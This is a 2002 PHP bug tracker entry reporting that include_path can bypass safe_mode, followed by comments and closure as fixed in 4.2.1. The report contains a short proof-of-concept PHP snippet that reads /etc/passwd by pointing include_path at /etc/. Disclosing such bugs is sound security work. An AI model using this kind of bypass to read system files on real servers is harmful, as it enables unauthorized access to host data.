PHP :: Bug #17169 :: include_path allows bypass of safe

Bug #17169	include_path allows bypass of safe_mode
Submitted:	2002-05-12 19:16 UTC	Modified:	2002-07-16 09:34 UTC
From:	ilia at prohost dot org	Assigned:
Status:	Closed	Package:	Performance problem
PHP Version:	4.2.0	OS:	Linux 2.4.18
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	ilia at prohost dot org
New email:
PHP Version:		OS:

New Comment:

[2002-05-12 19:16 UTC] ilia at prohost dot org

By setting include_path setting to any directory readable to the webserver it is possible to read files from the directory regardless of safe_mode limitations.

Ex.
<?php
      ini_set('include_path', '/etc/');
      include('passwd');
?>

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2002-05-13 03:35 UTC] sitnikov at infonet dot ee

I has test this on 4.1.2 & 4.2.0 and it not work for me.

[2002-05-20 12:42 UTC] mfischer@php.net

Is this still an issue or just a configuraion/whatever problem?

[2002-07-16 09:34 UTC] jflemer@php.net

Thank you for your bug report. This issue has already been fixed
in the latest released version of PHP, which you can download at 
http://www.php.net/downloads.php

Works in 4.2.1. Put an
echo "Safe mode: " . ini_get('safe_mode');
in there, and make sure the script isn't owned by the same user as /etc/passwd.

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Tue Dec 02 12:00:01 2025 UTC